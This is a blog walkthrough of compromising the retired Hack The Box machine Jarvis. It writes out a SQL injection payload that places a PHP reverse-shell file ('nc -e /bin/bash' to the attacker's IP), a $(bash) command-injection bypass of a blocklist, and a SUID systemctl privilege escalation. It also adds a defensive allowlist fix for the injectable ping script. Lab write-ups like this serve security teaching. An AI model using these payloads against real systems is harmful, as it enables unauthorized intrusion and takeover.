Hack The Box (HTB) Jarvis without SQLmap. Totally different Approach

Supriti Agrawal
4 min read · Jan 14, 2021

Hi guys, hope you are doing well!!! :) This is my first post on Medium :)

Today I am going to solve Jarvis (IP 10.10.10.143) from Hack The Box. It's a retired machine. I will use MySQL's 'write into file' functionality through SQL injection to write a PHP shell onto the server and get a reverse shell.

Let's get started.

I started with an nmap scan, nmap -sV -sC -o nmap 10.10.10.143, and found ports 22 and 80 open.

Port 22 would be useful if I found any credentials. I moved to port 80 and found the 'Hotel Stark' page.

I checked the application and found one parameter that looked vulnerable to SQL injection.

By changing the parameter value 3 to (4-1) or (5-2), I got the same result as for 3, so this was blind SQL injection. I found the total number of columns to be 7 by putting 3 order by 7 -- in place of 3.

When I tried 3 order by 8, it returned no results, which meant the total number of columns was 7.

I knew it was possible to achieve RCE through SQL injection using MySQL's 'write into file' (INTO OUTFILE) functionality. The same class of injection can also read the filesystem, e.g. /etc/passwd or other files, depending on the permissions of the database user.

But here, since it was blind SQL injection, nothing was returned in the response, so it was not possible to read /etc/passwd; it was still possible to write a shell to disk.

Since it is an Apache server, we can write a file to /var/www/html/shell.php. I captured the request in Burp

and changed the value 3 to:

3 union all select 1,2,3,4,5,6,'<?php passthru("nc -e /bin/bash 10.10.14.13 443"); ?>' into outfile '/var/www/html/shell.php' -- 

What we are doing here is injecting our payload into the seventh column, so that the written file contains it, and then accessing that file through the web server.

(Screenshot: request with shellcode payload)

I opened a listener on port 443 in my terminal and accessed shell.php at http://10.10.10.143/shell.php, and got a reverse connection to my machine.

Upgraded my shell using python -c 'import pty;pty.spawn("/bin/bash")'

The shell I got was www. I could not access user.txt since access was denied; it seemed only pepper could read it.

I tried sudo -l and found that www was able to run /var/www/Admin-Utilities/simpler.py as pepper.

I checked the script and one function caught my attention:

    import os

    def exec_ping():
        # Blocklist of shell metacharacters; anything not listed here is passed through
        forbidden = ['&', ';', '-', '`', '||', '|']
        command = input('Enter an IP: ')
        for i in forbidden:
            if i in command:
                print('Got you')
                exit()
        # The user input is concatenated straight into a shell command line
        os.system('ping ' + command)

Note: whenever you encounter a script, look for any exec-style function in it, as that is where command injection usually hides.

This script executes an OS command with ping, but '&', ';', '-', '`', '||' and '|' are blocked. $ is not blocked, so I tried that:

I ran sudo -u pepper /var/www/Admin-Utilities/simpler.py -p and when asked for an IP I gave $(bash), and got a shell as pepper.
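To show why the blocklist in simpler.py fails and what a safe version of exec_ping() looks like, here is an added example (my own code, not part of the original writeup or the box): the original blocklist check next to an allowlist check that only accepts a syntactically valid IP address and runs ping as an argv list with no shell. The function names (blocklist_allows, is_ip_address, build_ping_argv, safe_ping) are my own.

```python
import ipaddress
import subprocess

# The blocklist from the original simpler.py, reproduced so both approaches can be compared.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blocklist_allows(value: str) -> bool:
    """True when the original blocklist would let the input reach os.system()."""
    return not any(token in value for token in FORBIDDEN)


def is_ip_address(value: str) -> bool:
    """Allowlist check: accept only a syntactically valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_ping_argv(target: str, count: int = 1) -> list:
    """Build the ping command as an argv list. No shell is involved, so shell
    metacharacters in `target` are never interpreted; validation happens first anyway."""
    if not is_ip_address(target):
        raise ValueError(f"refusing to ping {target!r}: not an IP address")
    return ["ping", "-c", str(count), target]


def safe_ping(target: str) -> int:
    """Run ping without a shell and return the process exit status."""
    return subprocess.run(build_ping_argv(target), check=False).returncode


if __name__ == "__main__":
    # Constructed sample inputs: a real target, the bypass from the writeup, and a ';' payload.
    for candidate in ["10.10.10.143", "$(bash)", "10.10.10.143;id"]:
        print(f"{candidate!r}: blocklist allows={blocklist_allows(candidate)}, "
              f"allowlist accepts={is_ip_address(candidate)}")
```

The blocklist lets "$(bash)" through while the allowlist rejects everything that is not an address; the fix is validating the shape of the input, not enumerating bad characters.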

I was not able to run commands properly in that shell, so I took a reverse shell as pepper back to my Kali machine on port 4444.

Got user.txt.

For root, I ran linpeas.sh and it flagged one vector for privilege escalation through a SUID binary: systemctl.

After some research, I created a service file as below and transferred it to the victim machine.

I ran /bin/systemctl enable /home/pepper/root.service and then started the service with /bin/systemctl start root.

Got a shell as root :)

So, that was it. Let me know if you want to see any other HTB box solved with a different approach, or any other topic; I will try to cover it :)
